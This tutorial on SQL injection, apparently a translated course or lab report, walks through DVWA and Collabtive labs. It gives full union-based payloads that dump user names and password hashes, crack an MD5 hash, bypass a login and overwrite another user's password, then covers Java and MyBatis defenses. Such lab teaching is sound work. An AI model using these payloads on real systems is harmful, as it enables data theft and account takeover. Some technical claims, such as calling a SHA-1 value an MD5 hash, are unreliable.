Article From:
  • The principle of buffer overflow is studied; at least two databases are compared.
  • For different data types, we study how SQL injection points are discovered and how injection is performed.
  • Buffer overflow prevention methods are researched, comparing at least two programming languages.
  • Injection attack tools are studied against at least two kinds of databases.

Database basics

Comparison of databases MySQL and DB2

1. Account management mode

MySQL's account management is similar to Oracle's: accounts are managed by MySQL itself and stored in the user table of the mysql database, and an account consists of an IP address (host) plus a user name. DB2 has no user system of its own; its authentication depends entirely on operating-system accounts.

2. Authority management mode

MySQL's privilege management works the same way as DB2's: individual objects can be authorized, achieving fine-grained authorization. The difference is that MySQL does better at account security: because an account is a user name plus an IP address, authentication verifies both the user name and the legitimacy of the login IP, whereas DB2 only authenticates the connecting account. Another advantage of MySQL is that objects at the smallest unit can be authorized in batches; DB2 cannot do this and is relatively cumbersome, which is one of the places where DB2 needs improvement.

3. Log management

MySQL uses log double-write to guarantee the integrity and recoverability of the data, and its transaction log and archived log are two independent objects with no causal relationship between them, whereas DB2's archive log is generated from its transaction log. So the performance of MySQL on UDI (update/delete/insert) operations is a little worse than DB2's.

4. Management mode of locks

MySQL uses the MVCC model to implement lock concurrency control, while DB2 uses a memory model. MySQL's concurrency handling, in terms of resolving resource conflicts and lock conflicts, is better than DB2's.

5. Schema management mode

Strictly speaking, MySQL has no concept of a schema: each schema is equivalent to an independent database. A DB2 database can contain more than one schema. This is a deficiency of MySQL regarding schemas that needs improvement.

6. Management mode of tablespaces

MySQL only has the concept of tablespaces since 5.6, and its way of using tablespaces differs greatly from that of enterprise databases. MySQL is relatively weak in tablespaces, with many limitations, and has weaknesses in the management of striping and space. DB2 does these things very well; they are very robust and easy to maintain. These are places where MySQL needs to learn from enterprise databases.

7. How transactions are handled

By default, when MySQL handles transaction-related operations and a statement fails, it only rolls back the state of that statement; the whole transaction is not actually completed (committed or rolled back), and it is the application that chooses to commit or roll back the entire transaction when it detects the error. DB2 handles transactions differently: when a lock timeout or other problem causes an exception, DB2 rolls back the entire transaction instead of rolling back to the last savepoint, which needs special attention.

8. Management mode of data backup

MySQL has many ways of backing up, but the open-source community backup tools are very poor in supporting online backup and in ease of use. DB2 is very complete, rigorous and easy to use in this respect. This is another place where MySQL needs to learn from DB2.

9. Management mode of data recovery

MySQL's database recovery is very special: you can open the database and check the data during recovery or roll-forward, and if you need to continue rolling forward you can do so. This is an advantage of MySQL, and something commercial database vendors would do well to adopt. DB2 is very strict in recovery management: during roll-forward or recovery the database cannot be opened, in order to guarantee that the integrity and consistency of the data are not compromised. In my opinion this is both an advantage and a drawback: the advantage is simplicity, the shortcoming is poor flexibility. After rolling back to a point in time, do we actually have the data we need?

10. SQL functionality comparison

MySQL's support for complex SQL with many joins is not good enough, whereas DB2 is very powerful in supporting complex SQL and provides a variety of join methods to guarantee and improve data-access efficiency. This is where MySQL needs to learn from DB2.

11. DDL operation comparison

MySQL supports adding a column at any position to suit business needs, and also supports online DDL to ensure business continuity. None of these features are supported by DB2.

12. Syntax differences

By default, MySQL uses case-sensitive database, table and column names (this can be controlled by the lower_case_table_names parameter), whereas DB2 is case-insensitive.

Although both MySQL and DB2 follow the SQL92 standard and most SQL is compatible between them, there are differences in some implementation details. For example, MySQL uses the limit syntax to return the first few rows matching the criteria, while DB2 uses the fetch syntax.

13. High availability and disaster tolerance design

MySQL has many solutions for high availability and disaster tolerance. It supports a variety of architectures and replication solutions to meet high-availability and disaster-tolerance requirements, such as MHA, PXC and MMM, and is very flexible: it can be customized or further developed according to business requirements at almost zero cost. DB2 has only the HADR scheme in this area, and its cost is high.

MySQL also has many clustering solutions, such as Cobar, Atlas, Fabric, Amoeba, TDDL and Mycat, which can be customized or further developed and flexibly extended according to business requirements. DB2 currently has only pureScale in this area, with poor flexibility. This is where DB2 needs to learn from MySQL.

Familiarity with SQL statements

(1) Use the DVWA database:

use dvwa;

(2) Query all information about the user named “admin” in the users table:

select * from users where user='admin';

Three points in the statement above are worth noting:

  1. ‘*’: a wildcard that matches all columns.
  2. ‘where’: the keyword that defines the condition.
  3. In databases, strings are usually wrapped in single quotes. Here, select retrieves data from the database.

(3) Let’s look at another side of the select statement: it is equivalent to the output statement of a programming language.

select 'hello world!';

(4) If we have several items to output, we use “,” to separate them.

select user,user_id from users where user='admin';

When we only want to output data, rather than retrieve it:

select 'hello','world';
select 1,2,3;

(5) union

That is, union puts the set of data in front of it and the set of data behind it together so that they can be displayed in one table. Pay attention to what is being put together.

Look at the examples:

select 1,2,3 union select 4,5,6;

Parsing this, select 1,2,3 outputs three numbers: 1, 2 and 3. The select behind the union likewise outputs three numbers.

If the number of output columns behind the union does not match, the following error occurs:

The used SELECT statements have a different number of columns

This is a point we will use later for SQL injection.

(6) Next we learn order by, which sorts the data we retrieved in ascending or descending order.

select user,user_id from users order by user;

Here we introduce the concept of a “field”. A field is a data column in a table; each field represents one column. For example, here we retrieve the two columns user and user_id in our select statement. When we use order by user, the rows are sorted according to each value in the user column, ascending (ASC) by default.

Let’s look at another one:

select user,user_id from users order by user_id;

You can see that user_id is in increasing order. For descending order, use desc.

And here is a small tip:

Besides the field name, we can also use a number as the order by condition:

1 represents the first field

2 represents the second field

and so on. But when there is no such field, it produces an error like this:
unknown column name xx

SQL injection point

SQL injection types

1. Character type

1、Testing and analyzing the functionality of the page
We can see an input box here. According to the prompt above, we enter a user ID; after entering it, the page returns information about that user. Here we enter “1”.

You can see that it returns three rows of data: one line is the user ID we entered, one is the user name and the other is the user alias.

At the same time, looking at the browser’s address bar, we find the URL looks like this.


We can see id=1 in there. Is that the user ID we entered?
Here we enter “2” and find that the URL changes.


So we can conclude that the value of id we pass here is controllable: whatever we input passes through the id parameter!

2、Test the id parameter to see whether there is a SQL injection vulnerability.
Here we enter 1' in the input box; note the single quotation mark after the 1.
We find that an error is reported, telling us that our SQL statement has a syntax error.

Here we can make a guess. First, the id is wrapped in single quotes. The query may look like this:
select firstname,surname from users where id = '1';
When we add a quotation mark after the 1, the number of single quotes becomes unbalanced, and the query looks as follows:
select firstname,surname from users where id = '1'';
We can see that the last quotation mark is not closed. What do we do then?
There are several ways to handle this.
(1) Add another quotation mark to the original input, i.e. 1''.
The query statement then looks like this:
select firstname,surname from users where id = '1''';
This is where a bit of MySQL grammar comes in:

In a where clause, when there are several string pieces after "=", the one nearest to "=" takes the highest priority, with priority decreasing from left to right. Let's take a few examples. The first is a SQL query similar to ours:

select * from users where user_id = '1''';

The second one clarifies the priority:

select * from users where user_id = '1''2';

You can see that the result is still the same as user_id = 1. Let's look at a long one:

select * from users where user_id = '1''2''abc''efg';

Facts speak louder than words: the result is the same as above.

(2) The second way is to use the comment symbol # to comment out the remaining quotation mark.
The query statement then becomes:
select firstname,surname from users where id = '1'#';
(3) The third way is to use “--”, noting that there must be a space after “--”. In a URL, we need to use “+” in place of the space after “--”.
The query statement then becomes:
select firstname,surname from users where id = '1'-- ';

OK, let’s go back to our test page. The results are the same as for the input 1.
From this we know:
[1] The vulnerable parameter is “id”
[2] The type of vulnerability is character type

3、Well, after confirming the vulnerability, we need to construct a payload.
What is a payload?
It is the crafted input that makes the query return the data we want from the database.
(1) Analyzing the number of fields
Basically there are two ways of doing this.
[1] The reason for analyzing the number of fields is that we need the union select statement to get the sensitive data we want.
So, here, I leave a question: why can I guess that union can be used to get data?
(Hint: what is the function of this page?)
From our order by knowledge above, if the number after order by is larger than the number of fields, an error occurs. This lets us determine the number of fields.
The payloads we construct are as follows:
1' order by 1#
1' order by 2#
1' order by 3#
When we enter 3, an error occurs; that is, the number of fields is 2.

[2] The second way is to guess the number of fields directly with union select, because a mismatched number of fields also causes an error.
1' union select 1#
1' union select 1,2#
1' union select 1,2,3#
We find there is no error at union select 1,2, so the number of fields is 2. At the same time, notice that three more items seem to appear in the output. What are they?

These are the rows from our union select: the 1 and 2 show where the data of the second select appears, so by looking at the page we can see in which positions data will be displayed.
Tips: when the number of fields is small this is fine, but with many fields it becomes tedious. Next lesson, Hack with Python, we will write scripts to do these repetitive tasks.

(2) The number of fields is 2, meaning the result of the select has two columns, so we can output two items through union select. OK, let’s get information about our database.
1、Get the name of the current database and the current user name
1' union select database(),user()#
Here, database() returns the name of the database used by the current web site, and user() returns the user name of the current connection.
OK, here we see:
The current database is: DVWA
Current user name: root@localhost

A similar function, version(), gets the current database version.
Tips: sometimes the application's select statement limits the number of output rows with limit 1, so in general we invalidate the original query by giving an id that does not exist, as follows:
-1' union select database(),user()#
This returns only our data.
2、OK, our goal is to get the current users table, so we continue constructing the payload.
From the information above we know the current database name is DVWA. But that’s not enough! What is the name of the table?

Of course, it’s the users table!
And after that? Isn’t there a columns table?
So what do we need? table_name and table_schema.
And what are we looking for? column_name.

This time the payload we construct is as follows:
-1' union select column_name,2 from information_schema.columns where table_schema='dvwa' and table_name='users'#
Here, if you do not specify the database name 'dvwa' and there are users tables in other databases, a lot of confusing data will come back.

Wow, a lot of data! Which of it are we interested in?
Of course, user and password! Two fields, just right.
OK, let’s revise the payload again:
-1' union select user,password from users#

Bingo! We have dumped all user names and password values. But this password looks a little strange; count the characters: 32!
The password here is hashed with MD5, so although we obtained the administrator account and password, the password is only the hash.
Is that all? Not necessarily!
Tips: who asked you to run into me! Let me show you.
At this point we need to find a website that can crack MD5 hashes.
Well, the one I like best is this one (link).
OK, what we choose here is Pablo’s solution. The MD5 ciphertext is: 0d107d09f5bbe40cade3de5c71e9e9b7

You can see that the password has been cracked: it is “letmein”. Let’s verify it.
Look, we have logged in successfully!

2. Numeric type

1、Back to our SQL injection. You can see that this is the same as last time: an input box asks us to enter the value of id, and the firstname and surname corresponding to that id are returned.
[1] When we enter the normal value 1, we see the corresponding data returned.

[2] When we input 1', an error message appears. In other words, the user’s input has not been properly processed, resulting in a database syntax error. It seems there is something to work with!

At the same time, looking carefully, we notice that the single quote we entered has been escaped and has become \'. That is to say, the application’s filtering is probably based on a function similar to addslashes in PHP, which processes four characters: the single quote ['], the double quote ["], the backslash [\] and the null byte [NUL].
[3] Here we continue testing to see whether a similar function is used.
Test data:

(1) 1"


(3) %00. Note that we cannot type a null byte on the keyboard, but we can express it as %00 in the URL, so %00 appears in the address bar.

(4) Test the other characters, “-” and “&”. We find that although an error is reported, there is no escape character.

2、Now think about it: if this were a character-type injection point, since our single quote has been escaped, in principle no error message should appear.
First, select the DVWA database:
use dvwa;
Here we test it in the local database:
select * from users where user_id = '1\'';

It can be seen that when our input carries a single quotation mark with the escape sign, not only is no error reported, the query also succeeds.
(1) No error is reported because the single quote here has been escaped, and the value of the whole string is 1'.
(2) So why does the query succeed?
The knowledge involved is forced (implicit) type conversion. Let’s look at the table definition first:
describe users;

You can see that the type of user_id is int. When our query is like the one above, MySQL forcibly converts the string into an int, but this conversion is lossy!
Here are three examples; get a feel for it:
select * from users where user_id = ‘1abdc’;

select * from users where user_id = ‘abdc’;

select * from users where user_id = ‘2abdc’;

In the examples above, the second one does not start with a digit, so it is converted to 0 during the type change.
You can see this in detail in the example.
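As an added illustration of the coercion described above (not part of the original article), the Python below emulates MySQL's leading-prefix string-to-number conversion for the quoted-string case, and beside it the strict integer check a defender should apply to id before it reaches the query; the regex is my approximation of MySQL's behaviour, not MySQL's code.

```python
import re
from typing import Optional

# Added example, not from the article. It emulates what MySQL does when an
# INT column is compared with a string: the string is converted to a number
# using only its leading numeric prefix (leading whitespace allowed, trailing
# junk ignored), so '1abdc' and "1'" both compare equal to 1 and 'abdc' becomes 0.
_NUMERIC_PREFIX = re.compile(r"^\s*[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?")


def mysql_coerce_to_number(text: str) -> float:
    """Approximate MySQL's implicit string-to-DOUBLE conversion in comparisons."""
    match = _NUMERIC_PREFIX.match(text)
    if match is None:
        return 0.0          # no numeric prefix at all: MySQL uses 0
    return float(match.group(0))


def matches_int_column(column_value: int, user_input: str) -> bool:
    """Would WHERE user_id = '<user_input>' match a row with this user_id?"""
    return float(column_value) == mysql_coerce_to_number(user_input)


def strict_int_id(user_input: str) -> Optional[int]:
    """Defensive check the application should do before the query: accept
    only a canonical decimal integer, otherwise return None (reject).
    This also rejects the arithmetic probe '1+1' used for numeric injection."""
    if re.fullmatch(r"[0-9]{1,9}", user_input):
        return int(user_input)
    return None


if __name__ == "__main__":
    for probe in ("1abdc", "abdc", "2abdc", "1'", "1+1"):
        print(probe, "->", mysql_coerce_to_number(probe), strict_int_id(probe))
```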

3、From the analysis of the two parts above, we know that the data we pass in this time is not wrapped in single or double quotes. Now we introduce the second type of injection point: numeric injection.
(1) The test shows that it is numeric, so we can do simple addition and subtraction to find out whether there is an injection point.
Test: in the input box
[1] When entering 2, the user information for id 2 is returned.
[2] When entering 1+1, the result is the same as for 2. That means there is an injection point here. Similarly, you can use the “-”, “*” and “/” operators.

PS: note that in a URL, “+” has a special meaning: it represents a space. So in the URL we need to use “%2B” instead of “+”.

II. Constructing the payload
Simple explanation: in numeric injection our data is injected directly into the query without closing a single quote, so constructing the payload is very much like the character type.

1、Guessing the number of fields
Here we use order by to guess:
1 order by 1
1 order by 2
1 order by 3

We find that at 3 an error occurs, so the number of fields is 2.

2、After that, the process is just like character injection, only removing the single quote at the front of the payload and the comment symbol at the end. If you have doubts, look back at the section above. But let’s focus on this: if we want to use strings, there are two ways.

[1] Represent the string in hexadecimal; for example, admin converted to hexadecimal is “61646D696E”.

Then we prefix it with 0x to mark it as a hexadecimal literal: 0x61646D696E.

We construct the payload like this:
select * from users where user = 0x61646D696E;

[2] Use the char function, which here takes decimal ASCII values. For example, admin is
CHAR(97, 100, 109, 105, 110)
The constructed payload looks like this:
select * from users where user = CHAR(97, 100, 109, 105, 110);

3、The final payloads are constructed as follows.
Get the name of the database:
-1 union select 1,database()

Get the table name:

-1 union select table_name,2 from information_schema.tables where table_schema = database()

Get the column names of the users table
-1 union select column_name,2 from information_schema.columns where table_schema = database() and table_name = 0x7573657273

Get the contents of the table:
-1 union select user,password from users;

4、Well, when we go to the MD5 website to crack the password, our classmates get excited.
Here we choose the user whose user name is 1337, OK!

Programming language defenses


See the phpBB practice later.

MyBatis + Java defense examples
  1. When using JDBC, the SQL statement is built by string concatenation

    When using Statement's executeQuery, execute or executeUpdate, the SQL string passed in concatenates untrusted parameters from outside.

    Error example
    String userName = ctx.getAuthenticatedUserName(); // this is a constant
    // itemName is an external parameter concatenated into the SQL statement
    String sqlString = "SELECT * FROM t_item WHERE owner='" + userName + "' AND itemName='" + request.getParameter("itemName") + "'";
    stmt = connection.createStatement();
    rs = stmt.executeQuery(sqlString);

    Solution: 1) use precompiled (prepared) statements when untrusted data is used as a field value; 2) whitelist-check external parameters used as a table name, field name or sort mode in the SQL statement.

    Correct example: check itemName with a whitelist
    String userName = ctx.getAuthenticatedUserName(); // this is a constant
    String itemName = getCleanedItemName(request.getParameter("itemName"));
    String sqlString = "SELECT * FROM t_item WHERE owner='" + userName + "' AND itemName='" + itemName + "'";
    stmt = connection.createStatement();
    rs = stmt.executeQuery(sqlString);

    When using Connection's PreparedStatement, the SQL string used still concatenates untrusted parameters from outside.

    Error example
    String userName = ctx.getAuthenticatedUserName(); // this is a constant
    // itemName is an external parameter concatenated into the SQL statement
    String itemName = request.getParameter("itemName");
    // ... ensure that the lengths of userName and itemName are legitimate
    // ...
    String sqlString = "SELECT * FROM t_item WHERE owner=? AND itemName='" + itemName + "'";

    PreparedStatement stmt = connection.prepareStatement(sqlString);
    stmt.setString(1, userName);
    rs = stmt.executeQuery();

    Solution: 1) change the concatenation to placeholders; 2) whitelist-check external parameters that are concatenated into the SQL statement.

    Correct example: all parameters use placeholders

    String userName = ctx.getAuthenticatedUserName(); // this is a constant
    String itemName = request.getParameter("itemName");
    // ... ensure that the lengths of userName and itemName are legitimate
    // ...
    String sqlString = "SELECT * FROM t_item WHERE owner=? AND itemName=?";

    PreparedStatement stmt = connection.prepareStatement(sqlString);
    stmt.setString(1, userName); // JDBC parameter indexes start at 1
    stmt.setString(2, itemName);
    rs = stmt.executeQuery();

    Stored procedures that build SQL statements dynamically also carry SQL injection risk.

    Error example

    CREATE PROCEDURE sp_queryItem
        @userName varchar(50),
        @itemName varchar(50)
    AS
    DECLARE @sql nvarchar(500);
    SET @sql = 'SELECT * FROM t_item
        WHERE owner = ''' + @userName + '''
        AND itemName = ''' + @itemName + '''';
    EXEC(@sql); -- the concatenated string is executed as SQL

    Solution: use a parameterized query.

    Correct example: parameterized query

    CREATE PROCEDURE sp_queryItem
        @userName varchar(50),
        @itemName varchar(50)
    AS
    SELECT * FROM t_item
    WHERE owner = @userName
    AND itemName = @itemName;

  2. When using Hibernate, the statement passed to the API concatenates external parameters.

    When calling createQuery, the statement passed in concatenates untrusted parameters from outside.

    Error example
    // HQL statement concatenating an untrusted parameter
    String itemName = request.getParameter("itemName");
    Query hqlQuery = session.createQuery("from Item as item where item.itemName = '" + itemName + "'");

    Solution: 1) whitelist-check external parameters concatenated into the statement; 2) use Hibernate's configured mapping relationships.

    Correct example: whitelist-check the external parameter
    String itemName = request.getParameter("itemName");
    itemName = getCleanedItemName(itemName); // whitelist check
    Query hqlQuery = session.createQuery("from Item as item where item.itemName = '" + itemName + "'");

  3. When using MyBatis, the SQL statement uses the $ placeholder

    The configuration file uses the $ placeholder

    Error example:

    // With $, simple string concatenation is used underneath

SELECT * FROM t_item WHERE owner = $userName$ AND itemName = $itemName$

Solution: 1) change the $ placeholder into a # placeholder; 2) if external untrusted data is used as a table name, field name or sort mode, whitelist-check the external parameters.

Correct example: use the # placeholder

SELECT * FROM t_item WHERE owner = #userName# AND itemName = #itemName#

The SQL statement in the annotation of a MyBatis mapper-interface method uses the ${} placeholder.

Error example

    public interface IUserDAO {
        // the SQL statement in the annotation marks the placeholder with $, and the internal implementation is simple string concatenation
        @Select("select * from User where id=${id}")
        User getUser(@Param("id") String id);
    }

Correct example: the SQL statement in the annotation marks the placeholder with #, and the internal implementation uses parameterized preprocessing

    public interface IUserDAO {
        @Select("select * from User where id=#{id}")
        User getUser(@Param("id") String id);
    }
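The two fixes this section prescribes, binding untrusted values as parameters and whitelisting anything used as an identifier such as a sort column, as an added Python example over an in-memory SQLite table standing in for t_item; this is not the article's code, the table contents are constructed, and the itemName format and the sortable columns are assumptions.

```python
import re
import sqlite3
from typing import List, Tuple

# Assumption: these are the only columns of t_item a caller may sort by.
# An identifier cannot be bound with a placeholder, so it is whitelisted.
ALLOWED_SORT_COLUMNS = ("itemName", "owner")

# Whitelist pattern playing the role of getCleanedItemName() in the Java
# examples above (assumed format: letters, digits, '_' and '-', 1-64 chars).
_ITEM_NAME_PATTERN = re.compile(r"[A-Za-z0-9_-]{1,64}")


def is_clean_item_name(item_name: str) -> bool:
    """Whitelist check: True only if item_name matches the expected format."""
    return _ITEM_NAME_PATTERN.fullmatch(item_name) is not None


def is_allowed_sort_column(column: str) -> bool:
    """Whitelist check for a value used as an identifier (ORDER BY target)."""
    return column in ALLOWED_SORT_COLUMNS


def build_unsafe_sql(user_name: str, item_name: str) -> str:
    """The concatenation pattern from the 'error examples' above.

    Only builds the string; it is never executed here. A single quote in
    item_name terminates the literal early and the rest becomes SQL text.
    """
    return ("SELECT * FROM t_item WHERE owner='" + user_name
            + "' AND itemName='" + item_name + "'")


def query_items(conn: sqlite3.Connection, user_name: str, item_name: str,
                sort_by: str = "itemName") -> List[Tuple[str, str]]:
    """Hardened version: values are bound with '?' placeholders (the driver
    passes them separately from the SQL text, so quotes in them are only
    data), and the identifier used in ORDER BY must come from the whitelist."""
    if not is_allowed_sort_column(sort_by):
        raise ValueError("sort column rejected by whitelist: %r" % sort_by)
    sql = ("SELECT owner, itemName FROM t_item "
           "WHERE owner = ? AND itemName = ? ORDER BY " + sort_by)
    return conn.execute(sql, (user_name, item_name)).fetchall()


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the t_item table of the examples."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_item (owner TEXT, itemName TEXT)")
    conn.executemany("INSERT INTO t_item VALUES (?, ?)",
                     [("admin", "widget"), ("admin", "gadget"),
                      ("bob", "widget")])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = make_demo_db()
    probe = "1'#"  # the single-quote probe used earlier in the article
    print(build_unsafe_sql("admin", probe))      # the quote breaks the literal
    print(query_items(db, "admin", probe))        # [] : probe treated as data
    print(query_items(db, "admin", "widget"))     # [('admin', 'widget')]
    print(is_clean_item_name(probe))              # False
```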

Database injection practice

Collabtive system SQL injection experiment

Environment setup

(1) Start the MySQL database

(2) Start the Apache server

(3) Configure the DNS (hosts) entries

sudo vim /etc/hosts

(4) Configure the web site file

sudo vim /etc/apache2/conf.d/lab.conf

sudo service apache2 restart   # restart the service

(5) Turn off the PHP protection policy

sudo vim /etc/php5/apache2/php.ini

On magic_quotes_gpc:

When magic_quotes_gpc=on, we can skip applying addslashes() and stripslashes() to string data on its way into and out of the database, and the data will still be displayed correctly.

If you do apply addslashes() to the input data, you must use stripslashes() to remove the extra backslashes when outputting.

When magic_quotes_gpc=off:

The input data must be processed with addslashes(), but the output does not need stripslashes(), because addslashes() does not write the backslash into the database; it only helps MySQL parse the SQL statement correctly.

Experimental content

(1) SQL injection in select statements

Visit the login page: when we know the user name but not the password, how can we log in?

Check the login authentication file:

sudo vim /var/www/SQL/Collabtive/include/class.user.php

After the modification, restart the server:

sudo service apache2 restart

After our input is appended to $user, only the user name is verified and the rest of the statement is commented out.

After clicking login, we bypass the password and log in directly.


Login user name: admin') union update user set name='test'

Login password: random characters

Login fails.

Explanation of the reason

MySQL mechanism: update does not support union syntax.

(2) SQL injection in update statements

We can find the following code:

function edit($id, $name, $realname, $email, $tel1, $tel2, $company,
              $zip, $gender, $url, $address1, $address2, $state,
              $country, $tags, $locale, $avatar = "", $rate = 0.0)
{
    $name = mysql_real_escape_string($name);
    $realname = mysql_real_escape_string($realname);

    //modified for SQL Lab: $company is deliberately left unescaped
    //$company = mysql_real_escape_string($company);
    $email = mysql_real_escape_string($email);

    // further escaped parameters removed for brevity...

    $rate = (float) $rate;
    $id = (int) $id;

    if ($avatar != "") {
        $upd = mysql_query("UPDATE user SET name='$name', email='$email',
                            tel1='$tel1', tel2='$tel2', company='$company',
                            zip='$zip', gender='$gender', url='$url',
                            adress='$address1', adress2='$address2',
                            state='$state', country='$country',
                            tags='$tags', locale='$locale',
                            avatar='$avatar', rate='$rate' WHERE ID = $id");
    } else {
        // same query as above minus setting avatar; removed for brevity
    }
    if ($upd) {
        $this->mylog->add($name, 'user', 2, 0);
        return true;
    }
    return false;
}

The SQL statement is found to be SELECT ID WHERE name='$user', and the company field is the injection flaw, just as in experiment 1.

In this way, we can modify other users’ information and passwords beyond our own authority. We log in as any user, for example Bob.

Edit the user: in the user field fill in Ted; in the Company field fill in:

', pass = '9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684' WHERE ID = 4 # '

Note: the 9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684 here is the MD5 value of pass.

Click Modify, then log out of the current user and log in as Ted. This time, Ted’s password has been changed to pass.

Defense strategy

The fundamental problem behind SQL injection vulnerabilities is the lack of separation between data and code, so our defenses target exactly that.

Defense strategy 1: escape special characters

Enable magic_quotes_gpc by default, i.e. set magic_quotes_gpc to On.

Defense strategy 2: avoid the use of special characters

MySQL provides the function mysql_real_escape_string(), which can be used to escape special characters such as \x00, \n, \r, \, ', " and \x1a.

Defense strategy 3: separate data from SQL statements

Separate the SQL logic from the data, so that the database can tell which part is data and which part is the SQL statement.

sqlmap automated injection


SQL injection exploits imperfect input validation in a web application to make the application execute malicious instructions and code injected by the attacker, leading to harmful consequences such as leakage of sensitive information, privilege escalation, or unauthorized access to the system.

SQL injection attack steps:

  • Discover the SQL injection point
  • Determine the type of the back-end database
  • Guess the password of the administrator user in the back-end database
  • Upload an ASP back door and obtain default account permissions
  • Local privilege escalation
  • Use database extended stored procedures to execute shell commands

SQL injection attack tools:

  • wpoison: finds SQL injection vulnerabilities in dynamic web documents
  • wieliekoek.pl: takes the output of a web mirroring tool as input and injects strings into form pages
  • SPIKE Proxy: customizes the injected string
  • SPI Toolkit: tool kit

SQL injection attack prevention:

  • Use a type-safe parameter encoding mechanism
  • Thoroughly check all input coming from outside (users)
  • Replace dynamic SQL statements with stored procedures, precompiled SQL or ADO command objects
  • Harden the configuration and connections of the SQL database server
